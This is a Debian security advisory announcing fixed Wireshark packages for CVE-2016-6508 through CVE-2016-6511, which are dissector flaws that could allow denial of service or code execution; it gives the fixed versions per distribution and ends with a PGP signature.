 CVE-2016-6508 CVE-2016-6509 CVE-2016-6510 CVE-2016-6511

Multiple vulnerabilities were discovered in the dissectors for NDS,
PacketBB, WSP, MMSE, RLC, LDSS, RLC and OpenFlow, which could result in
denial of service or the execution of arbitrary code.

For the stable distribution (jessie), these problems have been fixed in
version 1.12.1+g01b65bf-4+deb8u8.

For the testing distribution (stretch), these problems have been fixed
in version 2.0.5+ga3be9c6-1.

For the unstable distribution (sid), these problems have been fixed in
version 2.0.5+ga3be9c6-1.

We recommend that you upgrade your wireshark packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: https://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1

iQIcBAEBAgAGBQJXriWXAAoJEBDCk7bDfE42vn0QAKQSyQoWuCxhCJuS4iASaeef
OCT1ai3/s8LG4yEZBKC6oSbsgKU7uqJO3cmb7U5x3BDmcdow3h7PYeTBlHf5rvpK
d0/HIN1Q/NMrkf1BQKJckqgNhDMzrgHonpyhi/Yidjgu+/CrUgMYeZhm563cn3Ni
yUvNdKQZ42yowEd6uhVNUifn4Pg1/h+x6LuPjvtiggcbEGLHnXzdmtoqwh27AhP0
Up3e+QO8N7P9/mCnB27Sm5whQXlNYem/zsIMsk0KVzXsEz7cBOm+GtrI4VsSlAc3
RtGSTkdAwAGi5i1l7fk3RAvOpLDy2KfgxxBR3fTv9KHgEu1EPpoFPIUdLgoEESlT
bs2B+zmNmOfktPjfh7r5JCeaWa+A0l07tP6CyYDqq4xP4IhiqShuGXz+/twoYMlg
NucTs04UlZVW3cayjGtiGc+8mnkdBohclrkaQjwyhv8ltnxGHfHoZHGNF7smOiVV
n3Qnzsg3iFsM4Pr5YPqUzWUmh7PMulOCY68KVgIOi/RoFKyActyNX3yG5bg8gdcJ
Bqi3J3UJWZ7fDxnuSX0vayuVq7O/2AxX+PiHsYfhi7XjWYz3R1sxny2TVZp4zKjF
YUKECkcL6cTbAt+keOaFl5gVAOElCPzBOgIJRVgx2TeJIkr3/baYrsfjnNFvNRNf
2UHuDtNdMlkdSfYKxlyD
=hOTx
-END PGP SIGNATURE-